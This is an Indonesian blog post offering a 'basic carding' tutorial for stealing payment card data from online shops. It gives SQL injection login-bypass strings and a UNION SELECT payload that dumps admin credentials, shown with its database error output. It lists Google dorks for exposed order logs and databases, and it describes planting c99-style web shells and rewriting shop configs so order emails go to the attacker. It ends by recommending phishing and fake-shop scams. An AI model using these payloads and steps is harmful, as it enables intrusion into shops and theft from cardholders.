Pengumuman, Waduh, Wall to Wall udah Gak Bisa Lagi ya ? ini Gara" ada Kebijakan Facebook untuk Mengalihkan Live Stream Menjadi Comment Box, Tapi Jangan Khawatir.. Update Status Via Blackberry dan yg lain masih Bisa koq, Mau tau apaan sih Comment Box itu ? Bisa Dilihat Disini, Nah, kalo ada Saran" ttg Gimana cara nge-akalin wall to wall, silahkan Contact Mimin di Facebook Disini atau Twitter @HzCrash, atau Bisa Lewat Fanspage WI Di Disini, Trima Kasih

Teknik Dasar Carding

Penulis on Sabtu, 10 Maret 2012

Mungkin langsung saja ya,kagak usah basa-basi :D,,sun dulu deh mua mua muah :* :*

1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic

Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:admin:’ or a=a–admin:’ or 1=1–user:’ or 1=1–admin:’ or 1=1–dsbContoh:Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”Misal target :http://www.namasitusnya.com/shop/admin/shopadmin.aspSilakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil

2. Shopping Order Log – Informasi Log Order di Server
Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.Contoh:Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”atau inurl:order filetype:txt / inurl:order filetype:log dsb.Misal target:http://www.namasitusnya.net/shop/admin/log/order.loghttp://www.namasitusnya.org/shop/order.cgi?dir=./order/order.loghttp://www.namasitusnya.la/shopping/DCShop/orders/orders.txtSelamat menemukan

3. Database Information – Database Source Location – Database Path
Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.Contoh:Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.Misal target:http://www.namasitusnya.com/shop/shopadmin/database.mdbhttp://www.namasitusnya.org//cgi-bin/eshop/database/order.mdbhttp://www.namasitusnya.com/fpdb/shop.mdbhttp://www.namasitusnya.com/shopping/data/vsproducts.mdbSelamat mencari.. ^^

4. SQL Injection Advanced Shop Vulnreabilty
Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb. Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.Contoh:Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsbhttp://www.targetnya.com/shop/product_details.php?item_id=13Ganti tulisan itu dengan :products_rss.php?category_id=1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*jadi : http://www.targetnya.com/shop/products_rss.php?category_id=1‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*dah kalo ada yang errornya kaya gini :

DB ERROR 1064

We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.

The details of the error are shown below. Please quote this in any correspondance regarding this problem.Page URL: http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*Referrer URL:Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_idMySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2′ at line 1

Nah klo udah jangan lupa decrypt passwordnya ya

5. Admin Shop Send Mail Order
Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.Contoh:Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.Misal target:http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.phpNah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:var $dbtype = ‘mysql’;var $host = ‘localhost’;var $user = ‘shop24_admin’;var $db = ‘shopsex_site’;var $mailer = ‘mail’;var $ordermailsendto = ‘ben@netboost.com.au‘;

Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..

6. Phising & Scaming
Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin. Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.

Nah gitu ajah dech dari gw, selamat berselancar dah..Segala tindak tanduk jadi tanggung jawab loe sendiri..

Jadikanlah ilmu sebagai pembelajaran yang berharga dalam hidup!



Anda sedang membaca artikel tentang Teknik Dasar Carding dan anda bisa menemukan artikel Teknik Dasar Carding ini dengan url https://watchinginfo.blogspot.com/2012/03/teknik-dasar-carding.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Teknik Dasar Carding ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link Teknik Dasar Carding sumbernya.

{ 2 komentar... read them below or add one }

BangBot Cyber4rt mengatakan...

ini ane udah bisa om, tapi males show opp...
oiya kita followback yuk om atau gak back link. link ente dah ane pasang di :
[http://dc-cyber4rt.blogspot.com/2012/03/back-link-gratis-dgn-dc-cyber4rt.html]

di tunggu lho om backlinknya :* =)) =))

Hendra Suherman mengatakan...

hohoho .. mastab kaka ..

oh iya .. dengan cara kk komen di blog ini aja udah dpt backlink ko kaka .. :D

Poskan Komentar

Blog Ini Bersifat Do Follow yg Berarti dpt Memberikan Backlink Gratis Kpd Blog Anda Jika Berkomentar Dibawah ini :

"Komentar Harus Bersifat Membangun Dan Tidak Menjatuhkan akan Kami Hargai"